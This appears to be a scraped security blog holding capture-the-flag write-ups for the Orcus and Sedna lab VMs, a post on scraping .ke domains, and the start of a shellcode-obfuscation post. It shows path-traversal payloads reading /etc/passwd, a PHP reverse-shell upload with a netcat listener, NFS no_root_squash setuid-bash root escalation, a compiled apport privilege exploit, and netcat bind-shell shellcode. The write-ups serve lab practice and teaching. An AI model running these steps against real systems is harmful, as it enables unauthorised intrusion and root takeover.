+ Entry '/site_rss.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/source_selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/thumb.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/ABOUT.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CHANGELOG.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CREDITS.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALLATION.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/README.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/RELEASE.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/TODO.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /files/: Directory indexing found.
+ Entry '/files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 30 entries which should be manually viewed.
+ Multiple index files found: /index.html, /index.php
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-2870: /index.php?download=/etc/passwd: Snif 1.2.4 allows any file to be retrieved from the web server.
+ OSVDB-59085: /index.php?|=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-59085: /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /files/: This might be interesting...
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3092: : This might be interesting... possibly a system shell found.
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /phpmyadmin/: phpMyAdmin directory found
+ 9338 requests: 0 error(s) and 48 item(s) reported on remote host
+ End Time: 2017-03-20 14:17:09 (GMT-4) (27 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

There are so many seemingly vulnerable, or actually vulnerable (I'll never know for sure), web apps, especially in the /external/ directory, so naturally I spent a long time here (so many wild goose chases).

At this URL http://172.16.94.136/backups/ I downloaded SimplePHPQuiz-Backupz.tar.gz but didn't have the permissions to download ssh-creds.bak. I somehow already knew it wouldn't amount to much. I extracted the folder, went to the configs folder and found database credentials.
 
<?php 
//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);

if (mysqli_connect_error()){

    echo "Could not connect to MySql. Please try again";
    exit();

}
?>

With this I immediately went to http://172.16.94.136/phpmyadmin/ and logged in. Boom!!
Now we have credentials to phpMyAdmin; all that is left is to write a shell using MySQL, browse to it and get a shell.....

except it didn't happen that way, as the credentials didn't have write permission to the web root. They didn't even have FILE permissions. The VM is loaded with a few databases, so I decided to go through them one by one to see if there were backends to other web apps that we hadn't found in the enumeration phase. We were rewarded with the /zenphoto/ folder, an app that had been missed by all my scanning and web bruting attempts. I browsed to it and had to install it first. I used the credentials from SimplePHPQuiz-Backupz.tar.gz and successfully installed it.


At this point the plan was to find a place to upload a webshell and get a reverse connection. I did this by:
Plugins --> Uploader --> tick "enable elFinder", then Apply

Go to the Upload tab --> click Files (elFinder) --> Zen photodata. Right-click on the pane on the right, click "create new text" and then paste in everyone's favorite php-reverse-shell.


After pasting it, right-click, Edit, and change the file extension to .php; then right-click again and click Open (remember to have set up a netcat listener first). Then we get a limited reverse shell.



www-data@Orcus:/tmp/rooter$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Orcus:/tmp/rooter$ cd /var/www
cd /var/www
www-data@Orcus:/var/www$ ls
ls
9bd556e5c961356857d6d527a7973560-zen-cart-v1.5.4-12302014.zip
a0c4f0d176f87ceda9b9890af09ed644-Adem-master.zip
b873fef091715964d207daa19d320a99-zenphoto-zenphoto-1.4.10.tar.gz
flag.txt
html
zenphoto-zenphoto-1.4.10
www-data@Orcus:/var/www$ cd html
cd html
www-data@Orcus:/var/www/html$ ls
ls
ls: cannot open directory '.': Permission denied
www-data@Orcus:/var/www$ cat flag.txt
cat flag.txt
868c889965b7ada547fae81f922e45c4
www-data@Orcus:/var/www$

With the first flag in the bag, let's try to get root on this box. It took me a while. I kept going off trying privilege escalation exploits, until this morning, when I came back to my nmap scans and found this:

2049/tcp open  nfs_acl     2-3 (RPC #100227)

I wonder why that didn't stick out to me in the first place. I quickly ran showmount.

root@kali:/tmp# showmount -e 172.16.94.136
Export list for 172.16.94.136:
/tmp *
 
I then checked the /etc/exports file and found that the NFS share was configured with no_root_squash:

www-data@Orcus:/$ cat /etc/exports
cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#        to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,no_root_squash) 


On our Kali box, we mount the share:
root@kali:~# rm -rf /mnt/orcus/
root@kali:~# mkdir /mnt/orcus
root@kali:~# mount -t nfs -o proto=tcp,port=2049 172.16.94.136:/tmp /mnt/orcus
root@kali:~# touch /mnt/orcus/rooter
root@kali:~# chmod 777 /mnt/orcus/rooter

In our limited shell on Orcus we copy the bash binary over our newly created world-writable /tmp/rooter:
www-data@Orcus:/$ cp /bin/bash /tmp/rooter

We head back to our Kali box and set the setuid bit on the /tmp/rooter file (the shell):
root@kali:~# chmod 4777 /mnt/orcus/rooter

We head into the /tmp folder, check to make sure the bit has been set, and then execute rooter with the -p option so that bash preserves the privileges, which gets us root. :-)


www-data@Orcus:/$ ls -al
total 1124
drwxrwxrwt 10 root root 4096 Mar 27 08:45 .
drwxr-xr-x 24 root root 4096 Oct 30 23:05 ..
drwxrwxrwt 2 root root 4096 Mar 27 08:36 .ICE-unix
drwxrwxrwt 2 root root 4096 Mar 27 08:36 .Test-unix
drwxrwxrwt 2 root root 4096 Mar 27 08:36 .X11-unix
drwxrwxrwt 2 root root 4096 Mar 27 08:36 .XIM-unix
drwxrwxrwt 2 root root 4096 Mar 27 08:36 .font-unix
-rwsrwxrwx 1 root root 1109564 Mar 27 08:50 rooter
drwx------ 3 root root 4096 Mar 27 08:36 systemd-private-9349aed2336c4fd5ad8749398e923f3c-dovecot.service-YyhShT
drwx------ 3 root root 4096 Mar 27 08:36 systemd-private-9349aed2336c4fd5ad8749398e923f3c-systemd-timesyncd.service-ENaVWk
drwx------ 2 root root 4096 Mar 27 08:36 vmware-root
www-data@Orcus:/$ ./rooter -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
cd /root
ls
flag.txt
cat flag.txt
807307b49314f822985d0410de7d8bfe
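
As an added check that is not part of the original writeup, the following Python script parses exports(5) syntax and flags the combination that made this box rootable: a share exported to any client with rw and no_root_squash. The sample exports text is constructed from the Orcus entry plus two safer entries for contrast.

```python
#!/usr/bin/env python3
"""Audit /etc/exports for the settings that made /tmp on Orcus rootable.

Constructed example, not part of the original writeup: it parses exports(5)
syntax and flags world exports, rw + no_root_squash, and 'insecure'.
"""
import re

# Constructed sample: the Orcus entry plus two safer exports for contrast.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
#        to NFS clients.  See exports(5).
/tmp *(rw,no_root_squash)
/srv/homes 10.0.0.0/24(rw,sync,root_squash,no_subtree_check)
/srv/pub *(ro,sync,all_squash)
"""

# a client with an option list, e.g. *(rw,no_root_squash), or a bare client name
CLIENT_RE = re.compile(r"(\S+?)\(([^)]*)\)|(\S+)")


def parse_exports(text):
    """Return a list of (path, client, options) tuples, one per client entry."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        path = parts[0]
        if len(parts) == 1:
            # exports(5): a path with no client list is exported to everyone
            entries.append((path, "*", set()))
            continue
        for m in CLIENT_RE.finditer(parts[1]):
            if m.group(1) is not None:
                opts = {o.strip() for o in m.group(2).split(",") if o.strip()}
                entries.append((path, m.group(1), opts))
            else:
                entries.append((path, m.group(3), set()))
    return entries


def assess(path, client, opts):
    """Return the findings for one export entry; an empty list means nothing flagged."""
    findings = []
    # exports(5) defaults are ro and root_squash, so only explicit options weaken things
    world = client == "*"
    writable = "rw" in opts
    root_kept = "no_root_squash" in opts and "all_squash" not in opts
    if world:
        findings.append("exported to every client")
    if root_kept:
        findings.append("no_root_squash: a remote root keeps uid 0 on " + path)
    if writable and root_kept:
        findings.append("rw with no_root_squash: root-owned setuid files can be "
                        "created on the share and run locally")
    if "insecure" in opts:
        findings.append("insecure: requests from unprivileged source ports accepted")
    return findings


def audit(text):
    """Map 'path client' to its findings for every flagged entry in an exports file."""
    report = {}
    for path, client, opts in parse_exports(text):
        findings = assess(path, client, opts)
        if findings:
            report[path + " " + client] = findings
    return report


if __name__ == "__main__":
    for entry, findings in audit(SAMPLE_EXPORTS).items():
        print(entry)
        for f in findings:
            print("  - " + f)
```

Run it against a real file with `audit(open("/etc/exports").read())`; the homes entry is the shape the share should have had.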

It was a great challenge that emphasized the importance of an organized approach as opposed to a random one. Thanks to Viper for the awesome challenge and of course g0tmi1k and the whole vulnhub community who keep the war games coming.

Monday, March 20, 2017

Solving hackfest2016: Sedna VM

First I scanned the box.

root@kali:/tmp# nmap -sT -A -P0 172.16.94.135
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-17 14:29 EDT
Nmap scan report for 172.16.94.135
Host is up (0.00055s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
| 2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_ 256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp open domain ISC BIND 9.9.5-3-Ubuntu
| dns-nsid:
|_ bind.version: 9.9.5-3-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3?
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 38660/udp status
|_ 100024 1 46739/tcp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: CAPABILITY
445/tcp open netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after: 2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after: 2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:68:AD:36 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 4.1.6-Ubuntu)
| NetBIOS computer name: SEDNA\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2017-03-17T14:31:40-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.55 ms 172.16.94.135
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.99 seconds
root@kali:~# us -mT -Iv 172.16.94.135:a -r 3000 -R 3 && us -mU -Iv 172.16.94.135:a -r 3000 -R 3
adding 172.16.94.135/32 mode `TCPscan' ports `a' pps 3000
using interface(s) eth0
scaning 1.00e+00 total hosts with 1.97e+05 total packets, should take a little longer than 1 Minutes, 12 Seconds
TCP open 172.16.94.135:22 ttl 64
TCP open 172.16.94.135:995 ttl 64
TCP open 172.16.94.135:111 ttl 64
TCP open 172.16.94.135:8080 ttl 64
TCP open 172.16.94.135:139 ttl 64
TCP open 172.16.94.135:110 ttl 64
TCP open 172.16.94.135:53 ttl 64
TCP open 172.16.94.135:993 ttl 64
TCP open 172.16.94.135:445 ttl 64
TCP open 172.16.94.135:143 ttl 64
TCP open 172.16.94.135:50201 ttl 64
TCP open 172.16.94.135:80 ttl 64
sender statistics 1908.1 pps with 196608 packets sent total
listener statistics 409090 packets recieved 0 packets droped and 0 interface drops
TCP open ssh[ 22] from 172.16.94.135 ttl 64
TCP open domain[ 53] from 172.16.94.135 ttl 64
TCP open http[ 80] from 172.16.94.135 ttl 64
TCP open pop3[ 110] from 172.16.94.135 ttl 64
TCP open sunrpc[ 111] from 172.16.94.135 ttl 64
TCP open netbios-ssn[ 139] from 172.16.94.135 ttl 64
TCP open imap[ 143] from 172.16.94.135 ttl 64
TCP open microsoft-ds[ 445] from 172.16.94.135 ttl 64
TCP open imaps[ 993] from 172.16.94.135 ttl 64
TCP open pop3s[ 995] from 172.16.94.135 ttl 64
TCP open http-alt[ 8080] from 172.16.94.135 ttl 64
TCP open unknown[50201] from 172.16.94.135 ttl 64
adding 172.16.94.135/32 mode `UDPscan' ports `a' pps 3000
using interface(s) eth0
scaning 1.00e+00 total hosts with 1.97e+05 total packets, should take a little longer than 1 Minutes, 12 Seconds
UDP open 172.16.94.135:53 ttl 64
UDP open 172.16.94.135:111 ttl 64
UDP open 172.16.94.135:137 ttl 64
UDP open 172.16.94.135:5353 ttl 255
sender statistics 1732.9 pps with 196635 packets sent total
listener statistics 36 packets recieved 0 packets droped and 0 interface drops
UDP open domain[ 53] from 172.16.94.135 ttl 64
UDP open sunrpc[ 111] from 172.16.94.135 ttl 64
UDP open netbios-ns[ 137] from 172.16.94.135 ttl 64
UDP open mdns[ 5353] from 172.16.94.135 ttl 255
root@kali:/tmp# nikto -h http://172.16.94.135
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.94.135
+ Target Hostname: 172.16.94.135
+ Target Port: 80
+ Start Time: 2017-03-17 14:37:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53fb059bb5bc8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 7536 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2017-03-17 14:38:32 (GMT-4) (35 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:/tmp# nikto -h http://172.16.94.135:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.94.135
+ Target Hostname: 172.16.94.135
+ Target Port: 8080
+ Start Time: 2017-03-17 14:39:49 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ Server leaks inodes via ETags, header found with file /, fields: 0xW/1895 0x1475867860000
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 7839 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2017-03-17 14:40:30 (GMT-4) (41 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
As I was clicking around I found this: http://172.16.94.135/files/be_demo/blog/categories/newlogo.jpg
With this I searched exploit-db and found this. I first tried to upload directly using the Firefox plugin Poster, but the uploads kept getting renamed and PHP extensions were being filtered somehow.
So I decided to try to upload the exploit first and then use it to upload the php-reverse-shell. This got me a limited shell on the system.
root@kali:/tmp# nc -lvp 443
listening on [any] 443 ...
172.16.94.135: inverse host lookup failed: Unknown host
connect to [172.16.94.130] from (UNKNOWN) [172.16.94.135] 58774
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
14:57:01 up 2 days, 20 min, 0 users, load average: 0.00, 0.03, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
www-data@Sedna:/var/www$ cat flag.txt
cat flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289
www-data@Sedna:/var/www$
For privilege escalation I used taviso's exploit [CVE-2015-1318 newpid (apport)]. The link to the exploit can be found here.
www-data@Sedna:/tmp/sploits/expl$ gcc newpid.c -o newpid
gcc newpid.c -o newpid
newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
# warning this file must be compiled with -static
^
www-data@Sedna:/tmp/sploits/expl$ ./newpid
./newpid
newpid: you *must* compile with -static
www-data@Sedna:/tmp/sploits/expl$ gcc newpid.c -o newpid -static
gcc newpid.c -o newpid -static
newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
# warning this file must be compiled with -static
^
www-data@Sedna:/tmp/sploits/expl$ ./newpid
./newpid
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
# id
id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
# pwd
pwd
/tmp/sploits/expl
# cd /root
cd /root
# ls
ls
8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip chkrootkit flag.txt
# cat flag.txt
cat flag.txt
a10828bee17db751de4b936614558305
#
Thanks to Viper for the awesome challenge and of course g0tmi1k and the whole vulnhub community who keep the war games coming.

Thursday, August 18, 2016

How to gather domains belonging to a Top Level Domain (TLD)

I was recently looking for a list of all domains belonging to a country. I tried the usual methods of googling for lists and came up empty; the sites that I found that claimed to have such lists were asking for money.....and you know how that usually goes. So I took it upon myself to scrape the Internet and find as many domains belonging to a country as possible. If anyone has a more elegant way of getting these kinds of lists that doesn't involve paying money, I'm all ears. For example, if you wanted to find the domains that belong to a country like Uganda, you'd have to find as many .ug domains as possible, or if you're German, find as many .de sites as possible. For this exercise I didn't bother including the .com, .net domains and the like, for obvious reasons. I have picked Kenya (.ke) as the country of interest. Without further ado let's dive in, but before we start, certain assumptions have to be made:
1.    All sites ending with .ke belong to Kenya
2.    All the domains are in 3 parts, in the format of, for example, ku.ac.ke
3.    We don't have any money to use the paid services (not really an assumption :-))

My first order of business was to collect the top visited sites belonging to that country on Alexa. Alexa lists the top 500 sites visited by each country. What better way to start finding domains than going to a site that has done part of the work for you? With this I quickly fired up Python and wrote a simple script that would give us a nice list of the domains in a clean format. I leveraged the Beautiful Soup library, which has amazing capabilities when it comes to scraping web pages.

#!/usr/bin/python
import urllib2
from bs4 import BeautifulSoup

text_file = open("top500kenyansites.txt", "w")
# Alexa paginates the per-country top 500 into 20 pages of 25 sites each
for i in range(0, 20):
    req = urllib2.Request('http://www.alexa.com/topsites/countries;%s/KE' % i,
                          headers={'User-Agent': 'Mozilla/5.0'})
    httpResponse = urllib2.urlopen(req)
    if httpResponse.code == 200:
        html = httpResponse.read()
        bs = BeautifulSoup(html, "lxml")
        # each listed site sits in a div.desc-container whose first <a> holds the domain
        sites = bs.find_all('div', {"class": "desc-container"})
        for site in sites:
            web = site.find('a')
            print web.text
            text_file.write(web.text + "\n")
    else:
        print "[-] There was an error in downloading the page\n"
text_file.close()

Disclaimer: Any change in the structure of the web page will break the scraper, so if by the time you read this post Alexa has changed its site's structure, the scraper will cease to work as expected.

Run the above script.

roman@ubuntu /tmp $ python topKEwebsites.py 

This gives us a nice list like the one below. (I've trimmed it for brevity)

Google.com
Youtube.com
Facebook.com
Standardmedia.co.ke
Nation.co.ke
Yahoo.com
The-star.co.ke
Sportpesa.com
Google.co.ke
Twitter.com
.
.
.
Cutewriters.com
Worldcat.org
Fao.org
Thesportbible.com
Nic-bank.com
Betradar.com
Shareasale.com
Fuzu.com
Samsung.com
Youtube-mp3.org
We'll check our top500kenyansites.txt list to make sure there are 500 sites.

cat top500kenyansites.txt | wc -l
500 

With this, we'll use bash to keep only those ending with .ke. The bash line below should suffice. This leaves us with 66 domains.

roman@ubuntu /tmp $ cat top500kenyansites.txt | grep '.ke$' > alexalist.txt
roman@ubuntu /tmp $ cat alexalist.txt | wc -l
66

Next we're going to scrape Google to find as many .ke domains as possible. For this post I'll do only Google, but if you want to be more thorough in your results you can leverage other search engines as well. The concepts are the same as with Google.

For this next step there are a number of ways of achieving this. You could use the Google API, but it's heavily limiting in terms of the number of results we get back; when I tried it I think I was limited to 10 results, which is hardly helpful since we're trying to get all the domains Google has indexed for the TLD in question. We could also pay for services like import[.]io, but that goes against one of the targets of this post (not spending money in the process of getting our list). Another way would be to scrape the Google results pages, as I first did when I attempted this exercise, but that is now a dead end as well, since what is returned by the HTTP request is meant for browsers to render and Beautiful Soup doesn't render, so we'd probably end up with empty containers which are later filled in dynamically as the page renders. Google probably did it to thwart attempts like this one. I finally decided on the method used by Chris Ains. With his method you need to have the Chrome browser, since he wrote a bookmarklet to get all the URLs from a particular search. Follow the steps listed in the link below.

http://www.chrisains.com/seo-tools/extract-urls-from-web-serps/

Once your browser is all set, we'll use the Google search operator "site:.ke". This should give us results like those in the screenshot below.

From this we can see the various second-level domains under the .ke TLD, i.e. .go.ke, .ac.ke, .or.ke, .me.ke. We'll repeat the searches for the other second-level domains that we have found. Don't forget to scroll to the end of each set of search results before clicking the bookmarklet, as stated in Chris' steps.

Go to the results processed by the bookmarklet and scroll to the URL list section. Copy all the URLs from all the results of the various second-level domain searches and put them in a text file.

roman@ubuntu /tmp $ cat kenyaURLs.txt | wc -l
3249

This gave me about 3249 URLs. The next plan is to extract the domain names from all the URLs.
We'll first strip the URLs down to their host names (dropping the scheme and paths) and remove the duplicates. This leaves us with about 1216 domains.

roman@ubuntu /tmp $ cat kenyaURLs.txt | cut -d"/" -f 3 | sort -u > uniqueDomains.txt
roman@ubuntu /tmp $ cat uniqueDomains.txt | wc -l
1216
roman@ubuntu /tmp $ cat uniqueDomains.txt | head
aasciences.ac.ke
abdalla.me.ke
about.me.ke
academics.uonbi.ac.ke
accommodation.ku.ac.ke
account.ecitizen.go.ke
acorce.nca.go.ke
actuarieskenya.or.ke
adc.or.ke
adis.uonbi.ac.ke

We quickly run into a problem: for example, academics.uonbi.ac.ke and adis.uonbi.ac.ke both belong to the same domain but are listed separately in our list.

roman@ubuntu /tmp $ sed -e 's/./\L&/' alexalist.txt >> uniqueDomains.txt 
roman@ubuntu /tmp $ cat uniqueDomains.txt | wc -l
1282
roman@ubuntu /tmp $ cat uniqueDomains.txt | sort -u | wc -l
1278
roman@ubuntu /tmp $ cat uniqueDomains.txt | sort -u > unifiedlist.txt
roman@ubuntu /tmp $ cat unifiedlist.txt | wc -l
1278
roman@ubuntu /tmp $ sed 's/^\( *\).*\.\(.*\..*\.\)/\1\2/' unifiedlist.txt | sort -u > FINAL.txt
roman@ubuntu /tmp $ cat FINAL.txt | wc -l
958

In the above snippets what I've done is append our first list (the one we got from Alexa) to our uniqueDomains.txt list. I first changed the first character of each line to lower case, since they all started with an uppercase letter and sort would otherwise have treated them differently.
I then sorted them so that the duplicates were removed, and then with the final esoteric sed command I basically removed all the sub-domains by keeping only the last three labels of each name (remember our academics.uonbi.ac.ke and adis.uonbi.ac.ke problem? This snippet solves it). So we end up with a nice list of 958 unique .ke domains. You can find the list of the domains as well as the code snippets on my GitHub.
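
The cut/sort/sed pipeline above, as an added Python example that is not the author's script: it extracts host names from scraped URLs and bare Alexa entries, lowercases them, and collapses each .ke host to its registrable domain. It generalizes the three-label assumption slightly: hosts under one of the second-level suffixes seen in the post (co.ke, ac.ke, go.ke, or.ke, me.ke) keep three labels, while a name registered directly under .ke keeps two. The sample entries are constructed from names that appear in the post.

```python
#!/usr/bin/env python3
"""Collapse scraped URLs and host names to unique registrable .ke domains.

Added example, not the author's script. It does in one place what the
cut | sort -u | sed pipeline in the post does: strip URL parts, lower-case,
keep only .ke hosts, drop sub-domains and de-duplicate.
"""
from urllib.parse import urlsplit

TLD = "ke"
# Second-level suffixes seen in the post (co.ke from Alexa; go/ac/or/me.ke from
# the site: searches). A host under one of these keeps three labels; a name
# registered directly under .ke keeps two.
SECOND_LEVEL = {"co", "ac", "go", "or", "me"}

# Constructed sample mixing Alexa-style bare names and scraped URLs.
SAMPLE_ENTRIES = [
    "Google.com",
    "Standardmedia.co.ke",
    "Nation.co.ke",
    "www.standardmedia.co.ke",
    "http://academics.uonbi.ac.ke/",
    "https://adis.uonbi.ac.ke:443/library",
    "http://account.ecitizen.go.ke/login",
    "about.me.ke",
    "kenya.ke",
]


def hostname_of(entry):
    """Lower-case host of a URL or bare host name, with any port stripped."""
    entry = entry.strip()
    if "://" not in entry:
        entry = "//" + entry            # make urlsplit treat it as a netloc
    return urlsplit(entry).hostname or ""


def registrable(host):
    """Registrable .ke domain for a host, or None if the host is not under .ke."""
    labels = host.rstrip(".").split(".")
    if len(labels) < 2 or labels[-1] != TLD:
        return None
    if labels[-2] in SECOND_LEVEL:
        if len(labels) < 3:
            return None                 # 'co.ke' alone is a suffix, not a domain
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def unique_domains(entries):
    """Sorted unique registrable .ke domains from a mixed list of URLs/hosts."""
    return sorted({d for d in (registrable(hostname_of(e)) for e in entries) if d})


if __name__ == "__main__":
    for dom in unique_domains(SAMPLE_ENTRIES):
        print(dom)
```

Feed it the lines of kenyaURLs.txt and alexalist.txt together and it produces the FINAL.txt list in one pass.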

Monday, January 26, 2015

Manual Shellcode Obfuscation

This post shows some techniques used in shellcode obfuscation. The shellcodes were taken from shell-storm.org.

;Shellcode obfuscation
;http://shell-storm.org/shellcode/files/shellcode-804.php
;linux x86 nc -lvve/bin/sh -p13377 shellcode
;This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker
;Author: evil_comrade
section .text
global _start
_start:
xor ebx,ebx ;Clear ebx register
imul ebx ;Clear all other registers
mov ebp, esp ;save stack pointer into ebp we'll refer to it later
mov edx, 0x556262CC ;Load 0x556262CC into edx reason will become clear soon
mov ebx, 0x555555FF ;Load 0x555555FF into ebx register
xor edx, ebx ;Xoring the above two values gives us 373733 (377)
push edx ;push the result onto the stack
